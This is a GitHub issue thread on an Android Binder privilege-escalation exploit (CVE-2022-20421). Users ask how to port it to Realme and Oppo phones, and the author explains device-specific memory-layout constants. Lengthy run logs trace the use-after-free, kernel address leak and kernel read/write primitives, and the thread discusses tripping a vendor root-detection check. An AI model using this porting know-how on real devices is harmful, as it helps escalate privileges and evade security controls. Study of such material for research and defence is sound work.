0xkol / badspin

Bad Spin: Android Binder Privilege Escalation Exploit (CVE-2022-20421)
MIT License
231 stars 32 forks source link

How to change certain constants to adapt the exploit for my device #13

Open kjjiffy opened 1 year ago

kjjiffy commented 1 year ago

I was trying to find out the replacement for the values 0x28000000 and 0x4010000000. What are these values? Can I find it out directly from the boot.img, if yes, what are the symbols that represents these values (ram offset and the other one)? As I am a beginner to this field, it would be a great help if you could help me. Any other values like these those I would need to change?

kjjiffy commented 1 year ago

The output I am getting till now is:

Bad Spin Exploit (CVE-2022-20421) by 0xkol

[x] Looking for binder_proc's inner_lock offset [x] Trigger vulnerability... (mode = 1) [14813:14813] New binder client: A [14815:14815] New binder client: C [14814:14814] New binder client: B A: lookup B => handle = 2 C: lookup A => handle = 2 A: Waiting for strong nodes... A: 1 references accepted A: Sending 1 strong handles to B C: Wait for A... Txn size: 1023.562500KB B: Searching for magic badcab1ebadcab1e.... B: Destroying monitor_thread_a: Waiting for death notification monitor_thread_a: Found dead binder (cookie = 0x5858585858585858) monitor_thread_a: Done B: Finish. A: Done sending transaction. BR_FAILED_REPLY poc_a_wait_for_c_death: Waiting for C death notification [x] Trigger use-after-free Testing ptmx 0 (fd 4) Reading ptmx 0 Testing ptmx 1 (fd 5) Reading ptmx 1 Freeing ptmx... poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161) [x] Finish spinning at spin_lock() Joining blocker threads... All blocker threads joined. offsetof(inner_lock, binder_proc) = 576 [x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)

[graveyard_process] pid = 15063 [pipe_process:15064] Pinned to CPU 0 [pipe_process:15065] Pinned to CPU 1 [pipe_process:15067] Pinned to CPU 3 [pipe_process:15066] Pinned to CPU 2 [pipe_process:15069] Pinned to CPU 5 [pipe_process:15068] Pinned to CPU 4 [pipe_process:15070] Pinned to CPU 6 [pipe_process:15071] Pinned to CPU 7 [fd_master_process] pid = 15073 [fd_master_process] Creating dup process spawner [fd_master_process] Creating 50 dup processes [fd_master_process] Setup 8 pipe processes [x] Shaping physical memory [fd_master_process] Creating 5 shapers [fd_master_process] Waiting for shapers... [shaper_process:15129] 30000 files sprayed [shaper_process:15128] 30000 files sprayed [shaper_process:15127] 30000 files sprayed [shaper_process:15126] 30000 files sprayed [shaper_process:15125] 30000 files sprayed [fd_master_process] Shapers done. [fd_master_process] Wait for all dup processes to finish [x] Trigger vulnerability... (mode = 3) [timer_master_process] pid=15157 [timer_master_process] Wait for C to enter spin_lock() [15158:15158] New binder client: A [15160:15160] New binder client: C [15159:15159] New binder client: B C: lookup A => handle = 2 A: lookup B => handle = 2 A: Waiting for strong nodes... B: Searching for magic badcab1ebadcab1e.... A: 1 references accepted A: Sending 1 strong handles to B Txn size: 1023.562500KB C: Wait for A... B: Destroying B: Finish. monitor_thread_a: Waiting for death notification monitor_thread_a: Found dead binder (cookie = 0x5858585858585858) monitor_thread_a: Done A: Done sending transaction. BR_FAILED_REPLY poc_a_wait_for_c_death: Waiting for C death notification [x] Trigger use-after-free [x] Waiting for timer threads poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161) [timer_master_process] Done. [x] Finish spinning at spin_lock() ..!............................................... [x] Failed.

[cleanup_fd_master] Cleanup zombie processes Cleanup dup processes Done. Reset pipe processes Cleanup shapers Done. Cleanup spawner Cleanup done. [fd_master_process] pid = 15212 [fd_master_process] Creating dup process spawner [fd_master_process] Creating 50 dup processes [fd_master_process] Setup 8 pipe processes [x] Shaping physical memory [fd_master_process] Creating 5 shapers [fd_master_process] Waiting for shapers... [shaper_process:15276] 30000 files sprayed [shaper_process:15277] 30000 files sprayed [shaper_process:15279] 30000 files sprayed [shaper_process:15275] 30000 files sprayed [shaper_process:15278] 30000 files sprayed [fd_master_process] Shapers done. [fd_master_process] Wait for all dup processes to finish [x] Trigger vulnerability... (mode = 3) [timer_master_process] pid=15326 [timer_master_process] Wait for C to enter spin_lock() [15327:15327] New binder client: A [15329:15329] New binder client: C [15328:15328] New binder client: B C: lookup A => handle = 2 A: lookup B => handle = 2 A: Waiting for strong nodes... B: Searching for magic badcab1ebadcab1e.... A: 1 references accepted A: Sending 1 strong handles to B C: Wait for A... Txn size: 1023.562500KB B: Destroying B: Finish. monitor_thread_a: Waiting for death notification monitor_thread_a: Found dead binder (cookie = 0x5858585858585858) monitor_thread_a: Done A: Done sending transaction. BR_FAILED_REPLY poc_a_wait_for_c_death: Waiting for C death notification [x] Trigger use-after-free [x] Waiting for timer threads poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161) [x] Finish spinning at spin_lock() [timer_master_process] Done. ..........................................!....... [x] Failed.

[cleanup_fd_master] Cleanup zombie processes Cleanup dup processes Done. Reset pipe processes Cleanup shapers Done. Cleanup spawner Cleanup done. [fd_master_process] pid = 15526 [fd_master_process] Creating dup process spawner [fd_master_process] Creating 50 dup processes [fd_master_process] Setup 8 pipe processes [x] Shaping physical memory [fd_master_process] Creating 5 shapers [fd_master_process] Waiting for shapers... [shaper_process:15581] 30000 files sprayed [shaper_process:15580] 30000 files sprayed [shaper_process:15582] 30000 files sprayed [shaper_process:15579] 30000 files sprayed [shaper_process:15578] 30000 files sprayed [fd_master_process] Shapers done. [fd_master_process] Wait for all dup processes to finish [x] Trigger vulnerability... (mode = 3) [timer_master_process] pid=15583 [timer_master_process] Wait for C to enter spin_lock() [15586:15586] New binder client: C [15585:15585] New binder client: B [15584:15584] New binder client: A C: lookup A => handle = 2 A: lookup B => handle = 2 A: Waiting for strong nodes... B: Searching for magic badcab1ebadcab1e.... A: 1 references accepted A: Sending 1 strong handles to B Txn size: 1023.562500KB C: Wait for A... B: Destroying B: Finish. monitor_thread_a: Waiting for death notification monitor_thread_a: Found dead binder (cookie = 0x5858585858585858) monitor_thread_a: Done A: Done sending transaction. BR_FAILED_REPLY poc_a_wait_for_c_death: Waiting for C death notification [x] Trigger use-after-free [x] Waiting for timer threads poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161) [x] Finish spinning at spin_lock() [timer_master_process] Done. .................................*................ [fd_master_process] Received 512 pipes [cleanup_fd_master] Cleanup zombie processes Cleanup dup processes Done. Cleanup shapers Done. Cleanup spawner Cleanup done. [x] Trying to escalate... Write page to every pipe Identifying pipe [identify_pipe] Found corrupted pipe! ret = 41414501 Closing unneeded ptmxs Closing unneeded pipes [x] Found corrupted ptmx and pipe. [fd_master_process] Done. [x] Leaking pipe buffer... [leak_pipe_buffer] Write to the pipe [leaker_thread] Wrote 1024 bytes to ptmx [leak_pipe_buffer] Try read 1024 bytes from ptmx [x] Leaked pipe buffer operations: ffffffd83cf37a28 [x] Leak pipe buffer operations success [x] Leaked pipe buffer page : ffffffff20ec1f80 [x] Leak pipe buffer page success [x] Found kernel base: ffffffd83ac00000

0xkol commented 1 year ago

I manually found a correspondence between the kernel image and the linear mapping. I'm afraid you should investigate further your device memory layout. Which device is it?

kjjiffy commented 1 year ago

It's a Realme device.

On Fri, 27 Oct, 2023, 22:22 Moshe Kol, @.***> wrote:

I manually found a correspondence between the kernel image and the linear mapping. I'm afraid you should investigate further your device memory layout. Which device is it?

— Reply to this email directly, view it on GitHub https://github.com/0xkol/badspin/issues/13#issuecomment-1783222363, or unsubscribe https://github.com/notifications/unsubscribe-auth/ADTTOIXHMNT5LDOAXB6LHSTYBPRDBAVCNFSM6AAAAAA6OBQ246VHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMYTOOBTGIZDEMZWGM . You are receiving this because you authored the thread.Message ID: @.***>

0xkol commented 1 year ago

sorry, i don't own such a device so i can't assist you with this problem.

kjjiffy commented 1 year ago

could you please let me know what the ram_offset value means in this context?

0xkol commented 12 months ago

0xa8000000 - 0x80000000 = 0x28000000

See the discussion on issue #12

kjjiffy commented 12 months ago

Thank you so much Kol for your timely reply. Now I got the idea. But still I'm stuck in the same position. I am suspecting whether it's the problem with the constant 0x4010000000. Can you please tell me how did you get this number?

0xkol commented 12 months ago

It's a constant for Samsung that converts between the kernel image (kimg) virtual address to a linear mapping virtual address. The 0x4010000000 is simply the difference between the kimg base to the linear mapping base (0xffffff8000000000).

kjjiffy commented 12 months ago

Thank you much, then that's also confirmed. When I debug the code I found that it is crashing when the read() function gets called. What might be the reason behind this.

kjjiffy commented 11 months ago

I could successfully get the read/write primitives. Thank you so much @0xkol. The conversations with you helped me a lot. Now I need to get the root permission.

0xkol commented 11 months ago

Try to replicate what i did on the pixel 6

kjjiffy commented 11 months ago

Couldn't get out of the function fix_zombie_processes. While debugging it is found that the execution is reaching to the function "atomic_compare_exchange_strong" and crashing. During that, a security warning is initiated in the device. 20231107_115528

kjjiffy commented 11 months ago

After a number of this kind of attempt, in one execution it didn't caused such an error but stopped the execution without returning from the function "wait_for_uao_ready". What might be the reason?

Bad Spin Exploit (CVE-2022-20421) by 0xkol

[x] Looking for binder_proc's inner_lock offset [x] Trigger vulnerability... (mode = 1) [11695:11695] New binder client: A [11697:11697] New binder client: C [11696:11696] New binder client: B A: lookup B => handle = 2 C: lookup A => handle = 2 A: Waiting for strong nodes... A: 1 references accepted A: Sending 1 strong handles to B C: Wait for A... B: Searching for magic badcab1ebadcab1e.... Txn size: 1023.562500KB B: Destroying B: Finish. monitor_thread_a: Waiting for death notification monitor_thread_a: Found dead binder (cookie = 0x5858585858585858) monitor_thread_a: Done A: Done sending transaction. BR_FAILED_REPLY poc_a_wait_for_c_death: Waiting for C death notification [x] Trigger use-after-free Testing ptmx 0 (fd 4) Reading ptmx 0 Testing ptmx 1 (fd 5) Reading ptmx 1 Freeing ptmx... poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161) [x] Finish spinning at spin_lock() Joining blocker threads... All blocker threads joined. offsetof(inner_lock, binder_proc) = 576 [x] Found binder_proc's inner_lock offset: 576 (vuln_fd 72)

[graveyard_process] pid = 11751 [pipe_process:11752] Pinned to CPU 0 [pipe_process:11753] Pinned to CPU 1 [pipe_process:11754] Pinned to CPU 2 [pipe_process:11755] Pinned to CPU 3 [pipe_process:11756] Pinned to CPU 4 [pipe_process:11757] Pinned to CPU 5 [pipe_process:11758] Pinned to CPU 6 [pipe_process:11759] Pinned to CPU 7 [fd_master_process] pid = 11764 [fd_master_process] Creating dup process spawner [fd_master_process] Creating 50 dup processes [fd_master_process] Setup 8 pipe processes [x] Shaping physical memory [fd_master_process] Creating 5 shapers [fd_master_process] Waiting for shapers... [shaper_process:11822] 30000 files sprayed [shaper_process:11820] 30000 files sprayed [shaper_process:11818] 30000 files sprayed [shaper_process:11819] 30000 files sprayed [shaper_process:11821] 30000 files sprayed [fd_master_process] Shapers done. [fd_master_process] Wait for all dup processes to finish [x] Trigger vulnerability... (mode = 3) [timer_master_process] pid=11876 [11879:11879] New binder client: C [timer_master_process] Wait for C to enter spin_lock() [11877:11877] New binder client: A [11878:11878] New binder client: B C: lookup A => handle = 2 A: lookup B => handle = 2 A: Waiting for strong nodes... B: Searching for magic badcab1ebadcab1e.... A: 1 references accepted A: Sending 1 strong handles to B C: Wait for A... Txn size: 1023.562500KB B: Destroying B: Finish. monitor_thread_a: Waiting for death notification monitor_thread_a: Found dead binder (cookie = 0x5858585858585858) monitor_thread_a: Done A: Done sending transaction. BR_FAILED_REPLY poc_a_wait_for_c_death: Waiting for C death notification [x] Trigger use-after-free poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161) [x] Finish spinning at spin_lock() [x] Waiting for timer threads [timer_master_process] Done. .................................................. [x] Failed.

[cleanup_fd_master] Cleanup zombie processes Cleanup dup processes Done. Reset pipe processes Cleanup shapers Done. Cleanup spawner Cleanup done. [fd_master_process] pid = 11945 [fd_master_process] Creating dup process spawner [fd_master_process] Creating 50 dup processes [fd_master_process] Setup 8 pipe processes [x] Shaping physical memory [fd_master_process] Creating 5 shapers [fd_master_process] Waiting for shapers... [shaper_process:12009] 30000 files sprayed [shaper_process:12013] 30000 files sprayed [shaper_process:12010] 30000 files sprayed [shaper_process:12011] 30000 files sprayed [shaper_process:12012] 30000 files sprayed [fd_master_process] Shapers done. [fd_master_process] Wait for all dup processes to finish [x] Trigger vulnerability... (mode = 3) [timer_master_process] pid=12058 [12059:12059] New binder client: A [timer_master_process] Wait for C to enter spin_lock() [12061:12061] New binder client: C [12060:12060] New binder client: B C: lookup A => handle = 2 A: lookup B => handle = 2 A: Waiting for strong nodes... A: 1 references accepted A: Sending 1 strong handles to B B: Searching for magic badcab1ebadcab1e.... Txn size: 1023.562500KB B: Destroying B: Finish. C: Wait for A... monitor_thread_a: Waiting for death notification monitor_thread_a: Found dead binder (cookie = 0x5858585858585858) monitor_thread_a: Done A: Done sending transaction. BR_FAILED_REPLY poc_a_wait_for_c_death: Waiting for C death notification [x] Trigger use-after-free [x] Waiting for timer threads poc_a_wait_for_c_death: Found dead binder (cookie = 0x6161616161616161) [x] Finish spinning at spin_lock() [timer_master_process] Done. ...............*.................................. [fd_master_process] Received 512 pipes [cleanup_fd_master] Cleanup zombie processes Cleanup dup processes Done. Cleanup shapers Done. Cleanup spawner Cleanup done. [x] Trying to escalate... Write page to every pipe Identifying pipe [identify_pipe] Found corrupted pipe! ret = 414144e0 Closing unneeded ptmxs Closing unneeded pipes [x] Found corrupted ptmx and pipe. [fd_master_process] Done. [x] Leaking pipe buffer... [leak_pipe_buffer] Write to the pipe [leaker_thread] Wrote 1024 bytes to ptmx [leak_pipe_buffer] Try read 1024 bytes from ptmx [leak_pipe_buffer] Try read 403 bytes from ptmx [leak_pipe_buffer] Try read 403 bytes from ptmx [x] Leaked pipe buffer operations: ffffffe96d137a28 [x] Leak pipe buffer operations success [x] Leaked pipe buffer page : ffffffff2091d1c0 [x] Leak pipe buffer page success [x] Found kernel base: ffffffe96ae00000 kallsyms_token_table file offset 0x220ef50 kallsyms_token_index file offset 0x220f300 kallsyms_markers file offset 0x220e6f0 kallsyms_num_syms (approx) 0x21700 kallsyms_num_syms (exact) 0x21638 kallsyms_relative_base 0xffffffe96ae00000 kallsyms_names file offset 0x202fd58 kallsyms_offsets file offset 0x1faa468 [x] kallsyms found successfully! [x] Kernel base: ffffffe96ae00000 [x] Found init_task: ffffffe96d7bbe40 [x] task_struct offsets: tasks at 1224 pid at 1480 tgid at 1484 thread_group at 1656 files at 1984 cred at 1920 [x] files_struct offsets: fdt at 32 [x] task_struct: ffffff80481e1280 [pipe_kwrite] kaddr = ffffff80481e1288 page = ffffffff01007840 size = 00000008 [pipe_close] Found task struct: ffffff8037544a00 file->private_data offset: 216 Candidate write_buf offset: 752 (ffffff87916f0000) [pipe_kwrite] kaddr = ffffff88dcbaa2f0 page = ffffffff2352ea80 size = 00000008 Switched to UAO-based read/write primitive [x] Successfully upgraded to stable RW primitives. \o/ Fixup zombie processes Fixup pid = 11751

CRASHED AFTER THIS

kjjiffy commented 11 months ago

May I know what is actually trying to do inside Fixup zombie processes' function?

kjjiffy commented 11 months ago

the content of adb logcat after obtaining the kenel base is here: 11-09 11:22:19.650 11944 11944 I BADSPIN : [leak_pipe_buffer] Write to the pipe 11-09 11:22:19.651 11944 13022 I BADSPIN : [leaker_thread] Wrote 1024 bytes to ptmx 11-09 11:22:19.651 11944 11944 I BADSPIN : [leak_pipe_buffer] Try read 1024 bytes from ptmx 11-09 11:22:19.652 11944 11944 I BADSPIN : [leak_pipe_buffer] Try read 777 bytes from ptmx 11-09 11:22:19.652 11944 11944 I BADSPIN : [leak_pipe_buffer] Try read 628 bytes from ptmx 11-09 11:22:19.652 11944 11944 I BADSPIN : [x] Leaked pipe buffer oprerations: ffffffe2f0937a28 11-09 11:22:19.652 11944 11944 I BADSPIN : [x] Leaked pipe buffer page : ffffffff20c8c580 11-09 11:22:19.749 11944 11944 I BADSPIN : kallsyms_token_table file offset 0x220ef50 11-09 11:22:19.749 11944 11944 I BADSPIN : kallsyms_token_index file offset 0x220f300 11-09 11:22:19.749 11944 11944 I BADSPIN : kallsyms_markers file offset 0x220e6f0 11-09 11:22:19.749 11944 11944 I BADSPIN : kallsyms_num_syms (approx) 0x21700 11-09 11:22:19.750 11944 11944 I BADSPIN : kallsyms_num_syms (exact) 0x21638 11-09 11:22:19.750 11944 11944 I BADSPIN : kallsyms_relative_base 0xffffffe2ee600000 11-09 11:22:19.751 11944 11944 I BADSPIN : kallsyms_names file offset 0x202fd58 11-09 11:22:19.751 11944 11944 I BADSPIN : kallsyms_offsets file offset 0x1faa468 11-09 11:22:19.751 11944 11944 I BADSPIN : [x] kallsyms found successfully! 11-09 11:22:19.751 11944 11944 I BADSPIN : [x] Kernel base: ffffffe2ee600000 11-09 11:22:19.780 11944 11944 I BADSPIN : [x] Found init_task: ffffffe2f0fbbe40 11-09 11:22:19.780 11944 11944 I BADSPIN : [x] task_struct offsets: 11-09 11:22:19.780 11944 11944 I BADSPIN : tasks at 1224 11-09 11:22:19.780 11944 11944 I BADSPIN : pid at 1480 11-09 11:22:19.780 11944 11944 I BADSPIN : tgid at 1484 11-09 11:22:19.780 11944 11944 I BADSPIN : thread_group at 1656 11-09 11:22:19.780 11944 11944 I BADSPIN : files at 1984 11-09 11:22:19.780 11944 11944 I BADSPIN : cred at 1920 11-09 11:22:19.780 11944 11944 I BADSPIN : [x] files_struct offsets: 11-09 11:22:19.780 11944 11944 I BADSPIN : fdt at 32 11-09 11:22:19.781 11944 13025 I BADSPIN : [wait_for_uao_new_job] entered 11-09 11:22:19.819 11944 11944 I BADSPIN : [x] task_struct: ffffff88605adc80 11-09 11:22:19.819 11944 11944 I BADSPIN : [wait_for_uao_ready] entered 11-09 11:22:19.819 11944 11944 I BADSPIN : [set_uao_new_job] entered 11-09 11:22:19.819 11944 11944 I BADSPIN : [set_uao_new_job] @ after atomic_thread_fence 11-09 11:22:19.819 11944 11944 I BADSPIN : [uao_kread] reached from set_uao_new_job 11-09 11:22:19.820 2384 2384 E OPLUS_KEVENT_RECORD: oplus_kevent Receive message from kernel, event_type=0 11-09 11:22:19.820 2384 2384 E OPLUS_KEVENT_RECORD: OPLUS_KEVENT payload:2000$$old_euid@@2000$$old_egid@@2000$$sys_call_number@@64$$addr_limit@@ffffffffffffffff$$curr_uid@@2000$$curr_euid@@2000$$curr_egid@@2000$$curr_name@@sleep$$ppid@@11132$$ppidname@@sh$$enforce@@1 11-09 11:22:19.820 2384 2384 E OPLUS_KEVENT_RECORD: 11-09 11:22:19.820 2384 2384 E OPLUS_KEVENT_RECORD: KEVENT_ROOT_EVENT uid_num:2000 11-09 11:22:19.821 2384 2384 I OPLUS_KEVENT_RECORD: oplus_package_list_parser_cb,name=com.android.shell 11-09 11:22:19.821 2384 2384 I OPLUS_KEVENT_RECORD: Enter oplus_record_kevent_to_file loop 11-09 11:22:19.839 2384 2384 I OPLUS_KEVENT_RECORD: Time of bootup(s) 200 11-09 11:22:19.845 2384 2384 W OPLUS_KEVENT_RECORD: Client find Service 11-09 11:22:19.845 2384 2384 W OPLUS_KEVENT_RECORD: Client call server diaplayDialog method 11-09 11:22:19.845 2384 2384 W OPLUS_KEVENT_RECORD: Client call set uid:2000 11-09 11:22:19.849 2639 3809 D CompatibilityChangeReporter: Compat change id reported: 157233955; UID 1000; state: ENABLED 11-09 11:22:19.850 2384 2384 W OPLUS_KEVENT_RECORD: Server exepction code: 0 11-09 11:22:19.856 11944 11944 I BADSPIN : [pipe_close] Found task struct: ffffff88153aca00 11-09 11:22:19.856 11944 11944 I BADSPIN : file->private_data offset: 216 11-09 11:22:19.856 11944 11944 I BADSPIN : Candidate write_buf offset: 752 (ffffff8847650000) 11-09 11:22:19.856 11944 11944 I BADSPIN : Switched to UAO-based read/write primitive 11-09 11:22:19.856 11944 11944 I BADSPIN : [x] Successfully upgraded to stable RW primitives. \o/ 11-09 11:22:19.856 11944 11944 I BADSPIN : Fixup zombie processes 11-09 11:22:19.856 11944 11944 I BADSPIN : Fixup pid = 12000 11-09 11:22:19.856 11944 11944 I BADSPIN : [wait_for_uao_ready] entered

In which an oplus_kevent is happening after the call of atomic_store(&uao->state, uao_state_new_job);

Is there any way to resolve this issue?

kjjiffy commented 11 months ago

On searching regarding “oplus_kevent“ in the source code, I could find a function oplus_root_check_succ().

Traceback =>

oplus_root_check_succ() ← oplus_root_check_post_handler() [ on checking if (get_fs() > 8000000000) ↔︎ get_fs returns the addr_limit of the current thread ] ← oplus_get_post_hook() ← oplus_hook_init()/exit()

Could that be the reason?

0xkol commented 11 months ago

Yeah it seems that the method of getting virtual r/w by overriding the addr_limit is detected by this rooting detection mechanism. I believe you should find some other method, unfortunately.

kjjiffy commented 11 months ago

Sure, I will try to figure it out @0xkol. Thanks a lot for your help.

kjjiffy commented 10 months ago

I could successfully exploit devices with kernel 5.4 and 5.10, that do not have the support of the rooting detection mechanism oplus_root_check_succ(). Thanks a lot for your valuable support in the beginning, which helped me a lot.

Out of curiosity, I have a doubt regarding the adaptation of this exploit to 4.19 kernel. I could see that this kernel is vulnerable, but is that possible to adapt the badspin exploit for 4.19 also?

Ko-Hi-Dev commented 2 months ago

@kjjiffy do you mind sharing your source code for badspin? I'm trying to get root access on my oppo find N.

I haven't figured out what makes it crash (haven't logged it yet) but I assume it's similar to your issue.

I just started working to get root yesterday and just started it, but source would be appreciated if available.

kjjiffy commented 2 months ago

Sorry, but it won't be possible to get the modified source code, since I keep only the base badspin code. But if you can share the logs, kernel source code link, and let me know the dev_config of the oppo find N, then I can atleast help you. BTW if you're expecting a solution for https://github.com/0xkol/badspin/issues/13#issuecomment-1804999597, then I cannot help you as I couldn't succeed to bypass it.

Ko-Hi-Dev commented 2 months ago

Sorry, but it won't be possible to get the modified source code, since I keep only the base badspin code. But if you can share the logs, kernel source code link, and let me know the dev_config of the oppo find N, then I can atleast help you. BTW if you're expecting a solution for #13 (comment), then I cannot help you as I couldn't succeed to bypass it.

I'm unsure if kernel source is available, but can check source later as well.

You don't have the modified source left?

Also can you share the exploit you built? Maybe I can try compare as well. I tried to do this on my vivo as well a time ago but didn't succeed back then

Ah I see, it didn't succeed on realme?